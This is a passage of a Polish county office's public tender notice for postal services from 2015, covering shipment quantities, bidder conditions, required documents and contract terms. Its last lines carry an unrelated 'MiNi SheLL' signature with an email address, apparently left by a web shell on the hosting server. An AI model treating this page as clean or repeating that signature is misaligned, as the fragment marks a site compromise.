19. Usługa zwrot przesyłki poleconej priorytetowej do siedziby zamawiającego
- w obrocie krajowym: 	do 350g	A	20 szt.,
		do 350 g	B	1 szt.,
		do 1000 g	A	1 szt.,
		do 1000 g	B	1 szt.,
		do 2000 g	A	1 szt.,
		do 2000 g	B	1 szt.
	
20. Usługa zwrot przesyłki poleconej ekonomicznej z potwierdzeniem odbioru (ZPO), do siedziby zamawiającego
- w obrocie krajowym: 	do 350g	A	2000 szt.,
		do 350 g	B	1 szt.,
		do 1000 g	A	1 szt.,
		do 1000 g	B	1 szt.,
		do 2000 g	A	1 szt.,
		do 2000 g	B	1 szt.
	
21. Usługa zwrot przesyłki poleconej priorytetowej z potwierdzeniem odbioru (ZPO), do siedziby zamawiającego
- w obrocie krajowym:	do 350g	A	20 szt.,
		do 350 g	B	1 szt.,
		do 1000 g	A	1 szt.,
		do 1000 g	B	1 szt.,
		do 2000 g	A	1 szt.,
		do 2000 g	B	1 szt.
				
22. Usługa zwrot przesyłki poleconej priorytetowej, do siedziby zamawiającego
- w obrocie zagranicznym 
(obszar Europy):	do 50g	1 szt.,
		ponad 50 g do 100 g	1 szt.,
		ponad 100 g do 350 g	1 szt.,
		ponad 350 g do 500 g	1 szt.,
		ponad 500 g do 1000 g	1 szt.,
		ponad 1000 g do 2000 g	1 szt.
23. Usługa zwrot przesyłki poleconej priorytetowej, do siedziby zamawiającego
- w obrocie zagranicznym 
(obszar poza Europą:	do 50g	1 szt.,
		ponad 50 g do 100 g	1 szt.,
		ponad 100 g do 350 g	1 szt.,
		ponad 350 g do 500 g	1 szt.,
		ponad 500 g do 1000 g	1 szt.,
		ponad 1000 g do 2000 g	1 szt.
24. Usługa zwrot przesyłki poleconej priorytetowej z potwierdzeniem odbioru (ZPO), do siedziby zamawiającego
 - w obrocie zagranicznym 
(obszar Europy):	do 50g	1 szt.,
		ponad 50 g do 100 g	1 szt.,
		ponad 100 g do 350 g	1 szt.,
		ponad 350 g do 500 g	1 szt.,
		ponad 500 g do 1000 g	1 szt.,
		ponad 1000 g do 2000 g	1 szt.
25. Usługa zwrot przesyłki poleconej priorytetowej z potwierdzeniem odbioru (ZPO), do siedziby zamawiającego 
- w obrocie zagranicznym 
(obszar poza Europą):	do 50g	1 szt.,
		ponad 50 g do 100 g	1 szt.,
		ponad 100 g do 350 g	1 szt.,
		ponad 350 g do 500 g	1 szt.,
		ponad 500 g do 1000 g	1 szt.,
		ponad 1000 g do 2000 g	1 szt.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 64.11.00.00-0, 64.11.20.00-4, 64.11.30.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Z uwagi na wartość przedmiotu zamówienia Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie Zamawiający wymaga w szczególności aby zamówienie było realizowane przez Wykonawcę, który posiada uprawnienia do wykonywania działalności pocztowej, na podstawie wpisu do rejestru operatorów pocztowych prowadzonego przez Prezesa Urzędu Komunikacji Elektronicznej zgodnie z art. 6 ustawy z dnia 23 listopada 2012 r. Prawo Pocztowe /tekst jednolity Dz. U. z 2012 r., poz. 1529/.

Wykonawca potwierdza spełnianie warunku poprzez złożenie:

- oświadczenia w trybie art. 22 ust 1 ustawy Prawo zamówień publicznych - (oświadczenie to stanowi zał. nr 3 do specyfikacji),
- oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę zaświadczenia potwierdzającego, iż Wykonawca został wpisany do rejestru operatorów pocztowych prowadzonego przez Prezesa Urzędu Komunikacji Elektronicznej.
Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia - nie
spełnia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach
wymaganych w specyfikacji)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia w trybie art. 22
ust. 1 ustawy Prawo zamówień publicznych (oświadczenie to stanowi załącznik nr 3 do
specyfikacji). Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia - nie
spełnia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach
wymaganych w specyfikacji)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia w trybie art. 22
ust. 1 ustawy Prawo zamówień publicznych (oświadczenie to stanowi załącznik nr 3 do
specyfikacji). Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia - nie
spełnia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach
wymaganych w specyfikacji)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia w trybie art. 22
ust. 1 ustawy Prawo zamówień publicznych (oświadczenie to stanowi załącznik nr 3 do
specyfikacji). Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia - nie
spełnia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach
wymaganych w specyfikacji)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia w trybie art. 22
ust. 1 ustawy Prawo zamówień publicznych (oświadczenie to stanowi załącznik nr 3 do
specyfikacji). Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia - nie
spełnia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach
wymaganych w specyfikacji)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Do oferty powinien być dołączony dokument określający zasady reprezentacji oraz osoby uprawnione
do reprezentacji Wykonawcy, a jeżeli Wykonawcę reprezentuje pełnomocnik - także pełnomocnictwo, określające zakres umocowania, podpisane przez osoby uprawnione do reprezentowania Wykonawcy.
Pełnomocnictwo do podpisania oferty winno być dołączone do oferty (oryginał lub kopia potwierdzona za
zgodność z oryginałem przez notariusza), o ile prawo do podpisania oferty nie wynika z innych
dokumentów dołączonych do oferty. 2.Wykonawca może polegać na wiedzy i doświadczeniu, potencjale
technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub
ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków.
Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował
zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne
zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby
wykonania zamówienia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 97</li>
<li>2 - Możliwość śledzenia przez Internet rejestrowanych przesyłek listowych i rejestrowanych przesyłek paczkowych - 3</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Ceny jednostkowe podane przez Wykonawcę nie będą podlegały zmianom i są stałe przez cały okres realizacji zamówienia, z poniższymi wyjątkami:
1.	W przypadku zmiany stawki podatku VAT na usługi pocztowe może nastąpić zmiana cen jednostkowych odpowiednio do stawki podatku. Jeżeli w trakcie obowiązywania umowy nastąpi zmiana w zakresie podatku od towarów i usług Zamawiający, po uprzednim pisemnym zawiadomieniu ze strony Wykonawcy o zaistnieniu tego zdarzenia, zobowiązuje się do uiszczenia opłaty powiększonej o podatek od towarów i usług według stawki obowiązującej w dniu wystawienia faktury/rachunku.
2.	Ceny określone przez Wykonawcę w ofercie ulegną obniżeniu w toku realizacji zamówienia w przypadku, gdy opłaty pocztowe wynikające ze standardowego cennika lub regulaminu Wykonawcy będą niższe od cen zawartych w przedłożonej ofercie. Wykonawca ma obowiązek wówczas stosować względem Zamawiającego obniżone opłaty pocztowe dla usług, wynikające ze swojego aktualnego cennika lub regulaminu.
3.	Zamawiającemu przysługuje możliwość korzystania z programów rabatowych (opustowych) oferowanych przez Wykonawcę w toku realizowanej umowy tak co ceny konkretnego rodzaju przesyłki, gabarytu jak i upustów od całości wartości miesięcznej faktury/rachunku.
4.	Wynagrodzenie należne Wykonawcy może ulec zmianie w stosunku do oferty Wykonawcy w przypadkach określonych w art. 142 ust. 5 ustawy Prawo zamówień publicznych jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę. Zmiana wynagrodzenia może nastąpić wyłącznie po akceptacji obu stron umowy i musi mieć formę pisemnego aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat.nowy-sacz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe
w Nowym Sączu, Zespół ds. Zamówień Publicznych, pok. 320 ul. Jagiellońska 33, 33-300 Nowy Sącz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.11.2015 godzina 10:15, miejsce: Starostwo Powiatowe w Nowym Sączu Kancelaria Administracyjna,
pok. 113, ul. Jagiellońska 33, 33-300 Nowy Sącz.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający przewiduje możliwość wykluczenia z postępowania o udzielenie
zamówienia Wykonawcy, który w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony
poważnie naruszył obowiązki zawodowe, w szczególności, gdy Wykonawca w wyniku zamierzonego
działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co Zamawiający
jest w stanie wykazać za pomocą dowolnych środków dowodowych. Zamawiający nie wykluczy z
postępowania o udzielenie zamówienia Wykonawcy, który udowodni, że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszaniu
obowiązków zawodowych w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia
obowiązków zawodowych lub zobowiązał się do ich naprawienia.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com